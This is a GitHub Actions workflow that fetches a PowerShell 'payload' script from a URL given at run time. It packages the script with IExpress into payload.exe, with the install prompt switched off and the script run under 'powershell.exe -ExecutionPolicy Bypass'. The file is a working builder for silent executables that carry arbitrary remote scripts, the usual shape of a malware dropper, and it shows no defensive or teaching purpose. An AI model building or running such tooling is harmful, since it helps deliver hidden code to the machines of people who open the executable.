name: Build EXE using IExpress

on:
  workflow_dispatch:
    inputs:
      payload_url:
        description: 'URL to fetch the PowerShell payload'
        required: true
        type: string

jobs:
  build:
    runs-on: windows-latest

    steps:
    # Step 1: Checkout the repository
    - name: Checkout code
      uses: actions/checkout@v3

    # Step 2: Verify IExpress is installed
    - name: Check if IExpress is available
      shell: cmd
      run: where iexpress || (echo "IExpress is missing!" && exit /b 1)

    # Step 3: Download PowerShell script from input URL
    - name: Fetch Payload Script
      shell: powershell
      run: |
        $url = "${{ github.event.inputs.payload_url }}"
        Invoke-WebRequest -Uri $url -OutFile "payload.ps1"
        Write-Host "Downloaded payload.ps1"

    # Step 4: Create package.sed file dynamically
    - name: Generate package.sed
      shell: cmd
      run: |
        echo [Version] > package.sed
        echo Class=IEXPRESS >> package.sed
        echo [Options] >> package.sed
        echo TargetName=payload.exe >> package.sed
        echo ShowInstallPrompt=0 >> package.sed
        echo FinishMessage= >> package.sed
        echo [Files] >> package.sed
        echo payload.ps1 >> package.sed
        echo [InstallSection] >> package.sed
        echo run=powershell.exe -ExecutionPolicy Bypass -File payload.ps1 >> package.sed

    # Step 5: Debug - Show package.sed contents
    - name: Validate package.sed file
      shell: cmd
      run: type package.sed

    # Step 6: Run IExpress to create EXE
    - name: Run IExpress
      shell: cmd
      run: |
        iexpress /N /Q package.sed > iexpress_log.txt 2>&1
        if %ERRORLEVEL% NEQ 0 (
          echo "IExpress failed! Log output:"
          type iexpress_log.txt
          exit /b %ERRORLEVEL%
        )

    # Step 7: Check if EXE was created
    - name: Verify EXE Output
      shell: cmd
      run: dir

    # Step 8: Upload the generated EXE
    - name: Upload Executable
      uses: actions/upload-artifact@v4
      with:
        name: built_exe
        path: "*.exe"

    # Step 9: Upload IExpress log if it failed
    - name: Upload IExpress Log (if failed)
      if: failure()
      uses: actions/upload-artifact@v4
      with:
        name: iexpress_log
        path: iexpress_log.txt



